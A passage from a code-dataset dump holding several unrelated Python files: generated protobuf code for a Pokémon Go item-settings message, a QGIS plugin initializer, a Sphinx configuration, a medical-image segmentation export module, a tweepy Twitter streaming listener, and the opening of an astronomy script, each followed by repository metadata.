serialized_pb=_b('\n-POGOProtos/Settings/Master/ItemSettings.proto\x12\x1aPOGOProtos.Settings.Master\x1a#POGOProtos/Enums/ItemCategory.proto\x1a!POGOProtos/Inventory/ItemId.proto\x1a#POGOProtos/Inventory/ItemType.proto\x1a\x34POGOProtos/Settings/Master/Item/FoodAttributes.proto\x1a\x36POGOProtos/Settings/Master/Item/PotionAttributes.proto\x1a\x36POGOProtos/Settings/Master/Item/ReviveAttributes.proto\x1a\x36POGOProtos/Settings/Master/Item/BattleAttributes.proto\x1a\x37POGOProtos/Settings/Master/Item/IncenseAttributes.proto\x1a\x38POGOProtos/Settings/Master/Item/PokeballAttributes.proto\x1a<POGOProtos/Settings/Master/Item/FortModifierAttributes.proto\x1a<POGOProtos/Settings/Master/Item/EggIncubatorAttributes.proto\x1a?POGOProtos/Settings/Master/Item/ExperienceBoostAttributes.proto\x1a@POGOProtos/Settings/Master/Item/InventoryUpgradeAttributes.proto\"\xab\x07\n\x0cItemSettings\x12-\n\x07item_id\x18\x01 \x01(\x0e\x32\x1c.POGOProtos.Inventory.ItemId\x12\x31\n\titem_type\x18\x02 \x01(\x0e\x32\x1e.POGOProtos.Inventory.ItemType\x12\x30\n\x08\x63\x61tegory\x18\x03 \x01(\x0e\x32\x1e.POGOProtos.Enums.ItemCategory\x12\x11\n\tdrop_freq\x18\x04 \x01(\x02\x12\x1a\n\x12\x64rop_trainer_level\x18\x05 \x01(\x05\x12\x45\n\x08pokeball\x18\x06 \x01(\x0b\x32\x33.POGOProtos.Settings.Master.Item.PokeballAttributes\x12\x41\n\x06potion\x18\x07 \x01(\x0b\x32\x31.POGOProtos.Settings.Master.Item.PotionAttributes\x12\x41\n\x06revive\x18\x08 \x01(\x0b\x32\x31.POGOProtos.Settings.Master.Item.ReviveAttributes\x12\x41\n\x06\x62\x61ttle\x18\t \x01(\x0b\x32\x31.POGOProtos.Settings.Master.Item.BattleAttributes\x12=\n\x04\x66ood\x18\n \x01(\x0b\x32/.POGOProtos.Settings.Master.Item.FoodAttributes\x12V\n\x11inventory_upgrade\x18\x0b \x01(\x0b\x32;.POGOProtos.Settings.Master.Item.InventoryUpgradeAttributes\x12L\n\x08xp_boost\x18\x0c \x01(\x0b\x32:.POGOProtos.Settings.Master.Item.ExperienceBoostAttributes\x12\x43\n\x07incense\x18\r \x01(\x0b\x32\x32.POGOProtos.Settings.Master.Item.IncenseAttributes\x12N\n\regg_incubator\x18\x0e \x01(\x0b\x32\x37.POGOProtos.Settings.Master.Item.EggIncubatorAttributes\x12N\n\rfort_modifier\x18\x0f \x01(\x0b\x32\x37.POGOProtos.Settings.Master.Item.FortModifierAttributesb\x06proto3')
,
dependencies=[POGOProtos_dot_Enums_dot_ItemCategory__pb2.DESCRIPTOR,POGOProtos_dot_Inventory_dot_ItemId__pb2.DESCRIPTOR,POGOProtos_dot_Inventory_dot_ItemType__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FoodAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PotionAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ReviveAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_BattleAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_IncenseAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PokeballAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FortModifierAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_EggIncubatorAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ExperienceBoostAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_InventoryUpgradeAttributes__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ITEMSETTINGS = _descriptor.Descriptor(
name='ItemSettings',
full_name='POGOProtos.Settings.Master.ItemSettings',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='item_id', full_name='POGOProtos.Settings.Master.ItemSettings.item_id', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='item_type', full_name='POGOProtos.Settings.Master.ItemSettings.item_type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='category', full_name='POGOProtos.Settings.Master.ItemSettings.category', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='drop_freq', full_name='POGOProtos.Settings.Master.ItemSettings.drop_freq', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='drop_trainer_level', full_name='POGOProtos.Settings.Master.ItemSettings.drop_trainer_level', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pokeball', full_name='POGOProtos.Settings.Master.ItemSettings.pokeball', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='potion', full_name='POGOProtos.Settings.Master.ItemSettings.potion', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='revive', full_name='POGOProtos.Settings.Master.ItemSettings.revive', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='battle', full_name='POGOProtos.Settings.Master.ItemSettings.battle', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='food', full_name='POGOProtos.Settings.Master.ItemSettings.food', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inventory_upgrade', full_name='POGOProtos.Settings.Master.ItemSettings.inventory_upgrade', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='xp_boost', full_name='POGOProtos.Settings.Master.ItemSettings.xp_boost', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='incense', full_name='POGOProtos.Settings.Master.ItemSettings.incense', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='egg_incubator', full_name='POGOProtos.Settings.Master.ItemSettings.egg_incubator', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='fort_modifier', full_name='POGOProtos.Settings.Master.ItemSettings.fort_modifier', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=779,
serialized_end=1718,
)
_ITEMSETTINGS.fields_by_name['item_id'].enum_type = POGOProtos_dot_Inventory_dot_ItemId__pb2._ITEMID
_ITEMSETTINGS.fields_by_name['item_type'].enum_type = POGOProtos_dot_Inventory_dot_ItemType__pb2._ITEMTYPE
_ITEMSETTINGS.fields_by_name['category'].enum_type = POGOProtos_dot_Enums_dot_ItemCategory__pb2._ITEMCATEGORY
_ITEMSETTINGS.fields_by_name['pokeball'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PokeballAttributes__pb2._POKEBALLATTRIBUTES
_ITEMSETTINGS.fields_by_name['potion'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PotionAttributes__pb2._POTIONATTRIBUTES
_ITEMSETTINGS.fields_by_name['revive'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ReviveAttributes__pb2._REVIVEATTRIBUTES
_ITEMSETTINGS.fields_by_name['battle'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_BattleAttributes__pb2._BATTLEATTRIBUTES
_ITEMSETTINGS.fields_by_name['food'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FoodAttributes__pb2._FOODATTRIBUTES
_ITEMSETTINGS.fields_by_name['inventory_upgrade'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_InventoryUpgradeAttributes__pb2._INVENTORYUPGRADEATTRIBUTES
_ITEMSETTINGS.fields_by_name['xp_boost'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ExperienceBoostAttributes__pb2._EXPERIENCEBOOSTATTRIBUTES
_ITEMSETTINGS.fields_by_name['incense'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_IncenseAttributes__pb2._INCENSEATTRIBUTES
_ITEMSETTINGS.fields_by_name['egg_incubator'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_EggIncubatorAttributes__pb2._EGGINCUBATORATTRIBUTES
_ITEMSETTINGS.fields_by_name['fort_modifier'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FortModifierAttributes__pb2._FORTMODIFIERATTRIBUTES
DESCRIPTOR.message_types_by_name['ItemSettings'] = _ITEMSETTINGS
ItemSettings = _reflection.GeneratedProtocolMessageType('ItemSettings', (_message.Message,), dict(
DESCRIPTOR = _ITEMSETTINGS,
__module__ = 'POGOProtos.Settings.Master.ItemSettings_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Settings.Master.ItemSettings)
))
_sym_db.RegisterMessage(ItemSettings)
# @@protoc_insertion_point(module_scope)
|
[
"[email protected]"
] | |
5b72718447dbd4f8681995d28894495e837162ec
|
e6ff97a6d68bc115ea72dd515b84266741f9ea8f
|
/MED/__init__.py
|
1905cc9a6cce245b569d665b2f77c412cab09e86
|
[] |
no_license
|
Elalasota/MED_centrum_miasta
|
3d23f6a12cf98452fb0233bb3657e66075a915ca
|
0cfddc190d2fc21e5c4786cd561bd0f63582b115
|
refs/heads/master
| 2021-01-09T20:40:43.244977 | 2016-05-29T15:59:18 | 2016-05-29T15:59:18 | 59,951,228 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,446 |
py
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
MED
A QGIS plugin
Wyznaczanie centrum miasta
-------------------
begin : 2015-01-18
copyright : (C) 2015 by Ela Lasota
email : [email protected]
git sha : $Format:%H$
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
This script initializes the plugin, making it known to QGIS.
"""
# noinspection PyPep8Naming
def classFactory(iface): # pylint: disable=invalid-name
"""Load MED class from file MED.
:param iface: A QGIS interface instance.
:type iface: QgsInterface
"""
#
from .MED import MED
return MED(iface)
|
[
"[email protected]"
] | |
5208b205cc65d2ed82f647b36279db82db70b513
|
5005140cc0c9a2247c3cfcc2bfa12d19472f6a9c
|
/doc/conf.py
|
026db6e72d4714ea7f2753238a5c9427aaa28b69
|
[
"WTFPL"
] |
permissive
|
cristoper/feedmixer
|
07a1cbb116eca1189c1e917f8a08ab17cdc44059
|
70bb0da59ad2a9869ff007f703eda3cafe8dcaaa
|
refs/heads/master
| 2023-08-08T03:04:49.504375 | 2023-07-25T23:13:09 | 2023-07-25T23:13:09 | 88,230,593 | 124 | 12 |
WTFPL
| 2023-07-25T23:13:10 | 2017-04-14T03:45:38 |
Python
|
UTF-8
|
Python
| false | false | 4,909 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# feedmixer documentation build configuration file, created by
# sphinx-quickstart on Thu Apr 13 15:29:09 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
autoclass_content = 'both'
autodoc_member_order = 'bysource'
default_role = 'any'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode',
'sphinx.ext.napoleon', 'sphinx_autodoc_annotation']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'feedmixer'
copyright = '2017, chris b'
author = 'chris b'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'feedmixerdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'feedmixer.tex', 'feedmixer Documentation',
'chris b', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'feedmixer', 'feedmixer Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'feedmixer', 'feedmixer Documentation',
author, 'feedmixer', 'One line description of project.',
'Miscellaneous'),
]
|
[
"[email protected]"
] | |
1954e1d277622077bd20c0d616dc58a3d5b3662f
|
0bd7a6bef178bb93b2c3fb19e789c7e3b364e6d1
|
/simple_frame/inference/segmentation_export.py
|
ea4b06435005677303a2da54ba9827504d7de7c2
|
[] |
no_license
|
Magnety/Simple_Frame_linux
|
090e07491e170314718c9ba5f2da2a4393bdb1ad
|
7e1ef5d11e3baa8784fd9b6bbf81b0d954dd1ca6
|
refs/heads/main
| 2023-06-02T09:35:36.023461 | 2021-06-17T09:23:01 | 2021-06-17T09:23:01 | 371,412,450 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 11,716 |
py
|
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from copy import deepcopy
from typing import Union, Tuple
import numpy as np
import SimpleITK as sitk
from batchgenerators.augmentations.utils import resize_segmentation
from simple_frame.preprocessing.preprocessing import get_lowres_axis, get_do_separate_z, resample_data_or_seg
from batchgenerators.utilities.file_and_folder_operations import *
def save_segmentation_nifti_from_softmax(segmentation_softmax: Union[str, np.ndarray], out_fname: str,
properties_dict: dict, order: int = 1,
region_class_order: Tuple[Tuple[int]] = None,
seg_postprogess_fn: callable = None, seg_postprocess_args: tuple = None,
resampled_npz_fname: str = None,
non_postprocessed_fname: str = None, force_separate_z: bool = None,
interpolation_order_z: int = 0, verbose: bool = True):
"""
This is a utility for writing segmentations to nifto and npz. It requires the data to have been preprocessed by
GenericPreprocessor because it depends on the property dictionary output (dct) to know the geometry of the original
data. segmentation_softmax does not have to have the same size in pixels as the original data, it will be
resampled to match that. This is generally useful because the spacings our networks operate on are most of the time
not the native spacings of the image data.
If seg_postprogess_fn is not None then seg_postprogess_fnseg_postprogess_fn(segmentation, *seg_postprocess_args)
will be called before nifto export
There is a problem with python process communication that prevents us from communicating obejcts
larger than 2 GB between processes (basically when the length of the pickle string that will be sent is
communicated by the multiprocessing.Pipe object then the placeholder (\%i I think) does not allow for long
enough strings (lol). This could be fixed by changing i to l (for long) but that would require manually
patching system python code.) We circumvent that problem here by saving softmax_pred to a npy file that will
then be read (and finally deleted) by the Process. save_segmentation_nifti_from_softmax can take either
filename or np.ndarray for segmentation_softmax and will handle this automatically
:param segmentation_softmax:
:param out_fname:
:param properties_dict:
:param order:
:param region_class_order:
:param seg_postprogess_fn:
:param seg_postprocess_args:
:param resampled_npz_fname:
:param non_postprocessed_fname:
:param force_separate_z: if None then we dynamically decide how to resample along z, if True/False then always
/never resample along z separately. Do not touch unless you know what you are doing
:param interpolation_order_z: if separate z resampling is done then this is the order for resampling in z
:param verbose:
:return:
"""
if verbose: print("force_separate_z:", force_separate_z, "interpolation order:", order)
if isinstance(segmentation_softmax, str):
assert isfile(segmentation_softmax), "If isinstance(segmentation_softmax, str) then " \
"isfile(segmentation_softmax) must be True"
del_file = deepcopy(segmentation_softmax)
segmentation_softmax = np.load(segmentation_softmax)
os.remove(del_file)
# first resample, then put result into bbox of cropping, then save
current_shape = segmentation_softmax.shape
shape_original_after_cropping = properties_dict.get('size_after_cropping')
shape_original_before_cropping = properties_dict.get('original_size_of_raw_data')
# current_spacing = dct.get('spacing_after_resampling')
# original_spacing = dct.get('original_spacing')
if np.any([i != j for i, j in zip(np.array(current_shape[1:]), np.array(shape_original_after_cropping))]):
if force_separate_z is None:
if get_do_separate_z(properties_dict.get('original_spacing')):
do_separate_z = True
lowres_axis = get_lowres_axis(properties_dict.get('original_spacing'))
elif get_do_separate_z(properties_dict.get('spacing_after_resampling')):
do_separate_z = True
lowres_axis = get_lowres_axis(properties_dict.get('spacing_after_resampling'))
else:
do_separate_z = False
lowres_axis = None
else:
do_separate_z = force_separate_z
if do_separate_z:
lowres_axis = get_lowres_axis(properties_dict.get('original_spacing'))
else:
lowres_axis = None
if verbose: print("separate z:", do_separate_z, "lowres axis", lowres_axis)
seg_old_spacing = resample_data_or_seg(segmentation_softmax, shape_original_after_cropping, is_seg=False,
axis=lowres_axis, order=order, do_separate_z=do_separate_z, cval=0,
order_z=interpolation_order_z)
# seg_old_spacing = resize_softmax_output(segmentation_softmax, shape_original_after_cropping, order=order)
else:
if verbose: print("no resampling necessary")
seg_old_spacing = segmentation_softmax
if resampled_npz_fname is not None:
np.savez_compressed(resampled_npz_fname, softmax=seg_old_spacing.astype(np.float16))
# this is needed for ensembling if the nonlinearity is sigmoid
if region_class_order is not None:
properties_dict['regions_class_order'] = region_class_order
save_pickle(properties_dict, resampled_npz_fname[:-4] + ".pkl")
if region_class_order is None:
seg_old_spacing = seg_old_spacing.argmax(0)
else:
seg_old_spacing_final = np.zeros(seg_old_spacing.shape[1:])
for i, c in enumerate(region_class_order):
seg_old_spacing_final[seg_old_spacing[i] > 0.5] = c
seg_old_spacing = seg_old_spacing_final
bbox = properties_dict.get('crop_bbox')
if bbox is not None:
seg_old_size = np.zeros(shape_original_before_cropping)
for c in range(3):
bbox[c][1] = np.min((bbox[c][0] + seg_old_spacing.shape[c], shape_original_before_cropping[c]))
seg_old_size[bbox[0][0]:bbox[0][1],
bbox[1][0]:bbox[1][1],
bbox[2][0]:bbox[2][1]] = seg_old_spacing
else:
seg_old_size = seg_old_spacing
if seg_postprogess_fn is not None:
seg_old_size_postprocessed = seg_postprogess_fn(np.copy(seg_old_size), *seg_postprocess_args)
else:
seg_old_size_postprocessed = seg_old_size
seg_resized_itk = sitk.GetImageFromArray(seg_old_size_postprocessed.astype(np.uint8))
seg_resized_itk.SetSpacing(properties_dict['itk_spacing'])
seg_resized_itk.SetOrigin(properties_dict['itk_origin'])
seg_resized_itk.SetDirection(properties_dict['itk_direction'])
sitk.WriteImage(seg_resized_itk, out_fname)
if (non_postprocessed_fname is not None) and (seg_postprogess_fn is not None):
seg_resized_itk = sitk.GetImageFromArray(seg_old_size.astype(np.uint8))
seg_resized_itk.SetSpacing(properties_dict['itk_spacing'])
seg_resized_itk.SetOrigin(properties_dict['itk_origin'])
seg_resized_itk.SetDirection(properties_dict['itk_direction'])
sitk.WriteImage(seg_resized_itk, non_postprocessed_fname)
def save_segmentation_nifti(segmentation, out_fname, dct, order=1, force_separate_z=None, order_z=0):
"""
faster and uses less ram than save_segmentation_nifti_from_softmax, but maybe less precise and also does not support
softmax export (which is needed for ensembling). So it's a niche function that may be useful in some cases.
:param segmentation:
:param out_fname:
:param dct:
:param order:
:param force_separate_z:
:return:
"""
# suppress output
print("force_separate_z:", force_separate_z, "interpolation order:", order)
sys.stdout = open(os.devnull, 'w')
if isinstance(segmentation, str):
assert isfile(segmentation), "If isinstance(segmentation_softmax, str) then " \
"isfile(segmentation_softmax) must be True"
del_file = deepcopy(segmentation)
segmentation = np.load(segmentation)
os.remove(del_file)
# first resample, then put result into bbox of cropping, then save
current_shape = segmentation.shape
shape_original_after_cropping = dct.get('size_after_cropping')
shape_original_before_cropping = dct.get('original_size_of_raw_data')
# current_spacing = dct.get('spacing_after_resampling')
# original_spacing = dct.get('original_spacing')
if np.any(np.array(current_shape) != np.array(shape_original_after_cropping)):
if order == 0:
seg_old_spacing = resize_segmentation(segmentation, shape_original_after_cropping, 0, 0)
else:
if force_separate_z is None:
if get_do_separate_z(dct.get('original_spacing')):
do_separate_z = True
lowres_axis = get_lowres_axis(dct.get('original_spacing'))
elif get_do_separate_z(dct.get('spacing_after_resampling')):
do_separate_z = True
lowres_axis = get_lowres_axis(dct.get('spacing_after_resampling'))
else:
do_separate_z = False
lowres_axis = None
else:
do_separate_z = force_separate_z
if do_separate_z:
lowres_axis = get_lowres_axis(dct.get('original_spacing'))
else:
lowres_axis = None
print("separate z:", do_separate_z, "lowres axis", lowres_axis)
seg_old_spacing = resample_data_or_seg(segmentation[None], shape_original_after_cropping, is_seg=True,
axis=lowres_axis, order=order, do_separate_z=do_separate_z, cval=0,
order_z=order_z)[0]
else:
seg_old_spacing = segmentation
bbox = dct.get('crop_bbox')
if bbox is not None:
seg_old_size = np.zeros(shape_original_before_cropping)
for c in range(3):
bbox[c][1] = np.min((bbox[c][0] + seg_old_spacing.shape[c], shape_original_before_cropping[c]))
seg_old_size[bbox[0][0]:bbox[0][1],
bbox[1][0]:bbox[1][1],
bbox[2][0]:bbox[2][1]] = seg_old_spacing
else:
seg_old_size = seg_old_spacing
seg_resized_itk = sitk.GetImageFromArray(seg_old_size.astype(np.uint8))
seg_resized_itk.SetSpacing(dct['itk_spacing'])
seg_resized_itk.SetOrigin(dct['itk_origin'])
seg_resized_itk.SetDirection(dct['itk_direction'])
sitk.WriteImage(seg_resized_itk, out_fname)
sys.stdout = sys.__stdout__
|
[
"[email protected]"
] | |
f56f9bcaa5d9294fc2f4329958f2a02d6b674c23
|
4503a3bfd940dce760b5f70e90e6fe2fe0cc4881
|
/week02/lectures/FirstCode.py
|
9d2c8a972ddc17efc1eafc379c1a682a399067d9
|
[] |
no_license
|
RicardoLima17/lecture
|
dba7de5c61507f51d51e3abc5c7c4c22ecda504f
|
b41f1201ab938fe0cab85566998390166c7fa7d8
|
refs/heads/main
| 2023-04-18T11:12:39.769760 | 2021-04-21T18:36:09 | 2021-04-21T18:36:09 | 334,456,464 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 103 |
py
|
# Programn that greets the user
# Author: Ricardo Rodrigues
print('Hello world! \nHow are you today')
|
[
"[email protected]"
] | |
790996181720155a34d4c398ecf0c34c1975d7fa
|
d53b659594941babb0ac33d18929f63cb7808cce
|
/python/test/twitter_streaming.py
|
b6d8bd6d30c5bac2e68c239244d15ca3d43c4bee
|
[
"Apache-2.0"
] |
permissive
|
brianmunson/MapperTwitter
|
479473307444c0eb1e01dfb66f59fcf143d56735
|
b47b8aa50ebe34a4263b2e47ccef47ea83266d14
|
refs/heads/master
| 2021-01-11T23:09:10.158012 | 2017-03-14T22:57:41 | 2017-03-14T22:57:41 | 78,553,738 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,002 |
py
|
# twitter streaming listener
# modified from adilmoujahid.com
import tweepy as ty
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import StreamListener
import os
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
consumer_key = os.environ.get("TW_CONSUMER")
consumer_secret = os.environ.get("TW_CONSUMER_SECRET")
access_token = os.environ.get("TW_ACCESS")
access_token_secret = os.environ.get("TW_ACCESS_SECRET")
auth = ty.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# class StdOutListener(StreamListener):
# def on_data(self, data):
# try:
# print(data)
# except:
# pass #ignore printing errors to console
# return True
# def on_error(self, status):
# print("Error with code: %s", status)
# return True
# def on_timeout(self):
# print("Timeout...")
# return True
class StdOutListener(StreamListener):
def __init__(self, api=None):
super(StdOutListener, self).__init__()
self.num_tweets = 0
def on_data(self, data):
if self.num_tweets < 10000:
try:
print(data)
self.num_tweets += 1
return True
except:
pass
return True
def on_error(self, status):
print("Error with code: %s", status)
return True
def on_timeout(self):
print("Timeout...")
return True
if __name__ == '__main__':
l = StdOutListener()
stream = ty.Stream(auth, l)
stream.filter(track=["InternetFriendsDay", "GalentinesDay"])
# stream.filter(track=["string1", "string2"])
# filters to track by string1, string2. can enter a longer list as well.
# stop program with Ctrl-C
# to run, from command line: python file_name.py > twitter_data.text
# here file_name is the name of the file containing this listener
|
[
"[email protected]"
] | |
fe271efef176ea856a983857fd44e6e559a41b2f
|
bf19f11f6e6626fa71550b9f2da72847f9db40f9
|
/tutorials/class_14/apps.py
|
72f8fa0f3b203b23675ce3861b0c6cedeb4d25de
|
[
"Apache-2.0"
] |
permissive
|
MeGustas-5427/SQL_Tutorials
|
b6caa6a325b423312e18949e88e5751883d21ac8
|
627372c2d5d8656d72645830c9a1fae1df278fc7
|
refs/heads/master
| 2023-04-06T10:19:53.022223 | 2021-03-20T13:20:50 | 2021-03-20T13:20:50 | 310,186,237 | 13 | 2 | null | 2021-01-14T02:34:57 | 2020-11-05T04:03:42 |
Python
|
UTF-8
|
Python
| false | false | 100 |
py
|
from django.apps import AppConfig
class Class14Config(AppConfig):
name = 'tutorials.class_14'
|
[
"[email protected]"
] | |
39ea59b534f5e9b9fe9597d3cb0a435cf20a1224
|
29fb2eb3b9bb21b529e814da53518fab2958693a
|
/thesis/images/ionizationStructure.py
|
bab29ae268d132cad0aaf36517a5e29f94941e0a
|
[] |
no_license
|
Vital-Fernandez/thesis_pipeline
|
acca734b1a2ce11b0bee5bd41fab534022ea295e
|
1253e2ed94e0f502a16cae6b88f84b633d0f16c2
|
refs/heads/master
| 2022-05-31T10:15:47.241645 | 2021-05-18T17:43:44 | 2021-05-18T17:43:44 | 90,319,650 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,922 |
py
|
from dazer_methods import Dazer
from numpy import nanmean, nanstd, mean, nan as np_nan
